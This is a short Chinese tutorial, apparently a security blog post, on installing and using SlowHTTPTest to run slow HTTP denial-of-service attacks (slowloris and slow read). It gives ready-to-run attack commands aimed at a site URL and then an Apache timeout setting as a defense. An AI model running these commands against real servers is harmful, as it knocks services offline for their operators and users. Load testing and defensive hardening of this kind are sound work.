SlowHTTPTest是一款对服务器进行慢攻击的测试软件,所谓的慢攻击就是相对于cc或者DDoS的快而言的,并不是只有量大速度快才能把服务器搞挂,使用慢攻击有时候也能到达同一效果。
slowhttptest包含了之前几种慢攻击的攻击方式,包括slowloris, Slow HTTP POST, Slow Read attack等。那么这些慢攻击工具的原理就是想办法让服务器等待,当服务器在保持连接等待时,自然就消耗了资源。
在kali中安装
在kali中,我们可以用apt命令直接进行安装。
apt-get install slowhttptest
其他系统安装
tar -xzvf slowhttptest-x.x.tar.gz
cd slowhttptest-x.x
./configure --prefix=PREFIX
make
sudo make install
查看帮助
slowhttptest -h
使用示例
警告!!!以下仅在测试环境进行实验,坚决反对一切危害网络安全的行为。slowloris模式:
slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://blog.bbskali.cn/index.html -x 24 -p 3
当service available显示为NO时。证明已经成功。
Slow Read模式:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u https://blog.bbskali.cn/index.html
如何防御
这里我们以apache为例
修改apache的配置文件httpd.conf
首先启用reqtimeout_module modules模块。默认已经启动,如果没有启动删掉前面的#号就行了。
然后,添加下面代码
RequestReadTimeout header=5-40,MinRate=500 body=20,MinRate=500
更多精彩文章 欢迎关注我们